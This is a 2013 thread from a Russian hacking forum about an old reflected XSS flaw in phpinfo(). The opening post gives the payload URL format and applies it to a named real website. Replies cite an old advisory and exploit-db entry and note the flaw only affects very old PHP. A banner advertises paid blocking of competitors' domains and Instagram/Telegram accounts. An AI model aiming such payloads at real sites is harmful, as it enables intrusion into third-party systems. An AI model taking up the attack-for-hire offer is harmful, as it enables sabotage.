Xss в phpinfo().

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Xss в phpinfo().

Опции темы

Поиск в этой теме

Опции просмотра

04.11.2013, 02:59

psihoz26

Постоянный

Регистрация: 22.11.2010

Сообщений: 545

С нами: 8142806

Репутация: 324

Не нашел про данную уязвимoсть ничего на форуме и поэтому решил запостить.

Формат уязвимой ссылки:

Код:

httр://site.com/phpinfo.php?a[]=alert('xss')

Пример:

Код:

http://www.infineform.com/info.php?a[]=alert('xss')

𝕏 Twitter Reddit Telegram Копировать ссылку

04.11.2013, 11:51

WallHack

Постоянный

Регистрация: 18.07.2013

Сообщений: 300

С нами: 6747446

Репутация: 32

Я на хостинге сайтов находил phpinfo надо проверить на XSS )

04.11.2013, 12:16

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Это старая бага:

http://www.php-security.org/MOPB/MOPB-08-2007.html

http://www.exploit-db.com/exploits/3405/

На том сайте что ты скинул для примера

Код:

Build Date 	Sep 28 2005 12:31:10

Версия правда 5.0.4, а пишут что только четвёртая ветка уязвима.

Короче будет работать только на очень старых версиях PHP.

04.11.2013, 15:01

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

С нами: 9642449

Репутация: 606

В четвертых версиях еще запатчили. Странно, почему на 5.0.4 вообще работает. Может не в четвертой, а в ранних версиях пятой.

04.11.2013, 15:11

t3cHn0iD

Новичок

Регистрация: 06.04.2009

Сообщений: 2

С нами: 8998242

Репутация: 2

Мда.Какая глобальная и "новая" уязвимость.

20.11.2013, 17:03

psihoz26

Постоянный

Регистрация: 22.11.2010

Сообщений: 545

С нами: 8142806

Репутация: 324

Я нигде не писал что уязвимость новая и что я её лично нашёл.

Не все же знали про эту уязвимость и на форуме не было упоминания её.

Кому надо взяли на заметку.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход